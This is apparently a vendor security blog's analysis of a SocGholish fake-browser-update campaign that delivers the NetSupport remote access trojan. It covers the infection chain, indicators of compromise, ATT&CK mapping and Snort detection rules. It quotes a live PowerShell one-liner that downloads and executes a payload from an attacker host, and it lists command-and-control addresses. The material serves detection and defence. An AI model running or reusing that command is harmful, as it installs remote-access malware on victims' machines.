Security

NetSupport Remote Access Trojan (RAT) delivered through fake browser updates by SocGholish threat actors

The SocGholish campaign is suspected to be linked to the Russian threat actor known as “Evil Corp”. The threat actors are known to drop HTML code into outdated or vulnerable websites. When a user visits the compromised website, the code generates a pop-up within the browser attempting to trick the user into believing their browser is outdated. If a user is enticed to believe their browser is outdated, clicking the “Update” link causes the download of an archive file containing a malicious JavaScript. After the JavaScript is executed, additional malware is downloaded and installed on the user’s computer.

Infection chain

Compromised Site [Redacted] – Drive-by
casting.faeryfox[.]com – SocGholish Command and Control (C2)
aeoi[.]pl/21.ico – NetSupport RAT Download Site
94.158.247[.]32/fakeurl.htm – NetSupport RAT C2

The image is a screenshot showing PCAP traffic observed during infection.
Shown above: PCAP traffic observed during infection.

Initial access (drive-by)

Initial access was obtained when the user browsed to the compromised site hosting the injected HTML code.

The screenshot shows obfuscated HTML code injected into compromised site which redirects visitors to Fake-Browser Update page.
Shown above: Obfuscated HTML code injected into compromised site which redirects visitors to Fake-Browser Update page
The screenshot shows a Fake Browser Update page enticing user to download archive file containing malicious JavaScript.
Shown above: Fake Browser Update page enticing user to download archive file containing malicious JavaScript

Execution

The execution stage was obtained when the user was tricked into downloading and executing the JavaScript within the downloaded archive file. The JavaScript was executed using the Windows Wscript process. The JavaScript contained obfuscated code which calls the Windows PowerShell process to connect with the download site and execute an additional PowerShell script.

Parent Process: C:\Windows\System32\wscript.exe
Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing http://aeoi.pl/21.ico |iex”

PowerShell Module Logs: CommandInvocation(Invoke-WebRequest): “Invoke-WebRequest” ParameterBinding(Invoke-WebRequest): name=”UseBasicParsing”; value=”True” ParameterBinding(Invoke-WebRequest): name=”Uri”; value=”http://aeoi.pl/21.ico” CommandInvocation(Invoke-Expression): “Invoke-Expression”

The screenshot shows a PowerShell user agent from infected host and PowerShell script hosted on download site
Shown above: PowerShell user agent from infected host and PowerShell script hosted on download site
The screenshot shows a Partial PowerShell script used to install and rename NetSupport RAT client.
Shown above: Partial PowerShell script used to install and rename NetSupport RAT client
This screenshot shows the File download and installed associated with the NetSupport RAT.
Shown above: File download and installed associated with the NetSupport RAT
The screenshot displays code that shows after installation NetSupport attempts to identify the user’s geo-location
Shown above: After installation NetSupport attempts to identify the user’s geo-location
Screenshot displays NetSupport client metadata showing original name after renaming
Shown above: NetSupport client metadata showing original name after renaming

Persistence

Persistence was obtained by the PowerShell script hosted on the download site. The script created a registry key to run at startup.

Screen shots displays the Registry Key created to start renamed NetSupport client whost.exe
Shown above: Registry Key created to start renamed NetSupport client whost.exe

Command and control

The screenshot displays C2 network communications from infected host to NetSupport RAT
Shown above: C2 network communications from infected host to NetSupport RAT

OpenText custom content to identify NetSupport RAT behaviours

Sigma rules

The screenshot shows the Sigma Rule used to detect process behavior associated with the NetSupport RAT
Shown above: Sigma Rule used to detect process behavior associated with the NetSupport RAT
The screenshot shows the Sigma Rule used to detect PowerShell Module Script behavior associated with the NetSupport RAT.
Shown above: Sigma Rule used to detect PowerShell Module Script behavior associated with the NetSupport RAT

Snort rules

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OpenText – Windows Powershell User-Agent”; flow:established,to_server; content:”User-Agent|3a 20|Mozilla/”; content:”) WindowsPowerShell/”; http_header; classtype:not-suspicious; sid:20228161; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OpenText – NetSupport GeoLocation Lookup”; flow:established,to_server; content:”Host|3a 20|geo.netsupportsoftware.com|0d 0a|”; http_header; content:”GET”; http_method; content:”/location/loca.asp”; http_uri; sid:20228162; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:”OpenText – NetSupport RAT POST Request”; flow:established,to_server; content:”POST”; content:”User-Agent|3A 20|NetSupport Manager/”; nocase; sid:20228163; rev:1;)

Indicators of compromise

SHA-256 Hash: 520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61 – Сhrome.Updаte.zip
https://www.virustotal.com/gui/file/520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61/details

SHA-256 Hash: 1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d – AutoUpdater.js  https://www.virustotal.com/gui/file/1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d/details

SHA-256 Hash: b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad – client32.exe
https://www.virustotal.com/gui/file/b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad/details

MITRE ATT&CK techniques observed

T1189 Drive-by Compromise
T1059.007 JavaScript
T1059.001 PowerShell
T1547.001 Registry Run Keys / Startup Folder
T1140 Deobfuscate/Decode Files or Information
T1219 Remote Access Software

Maintaining system protection

The OpenTextTM Security Services team uses their extensive experience to identify an organization’s security risks and work with them to keep systems protected, offering multiple services to address cybersecurity and privacy objectives. Contact us for more information.

Author: Lenny Conway, Lead Consultant

Related Posts

Back to top button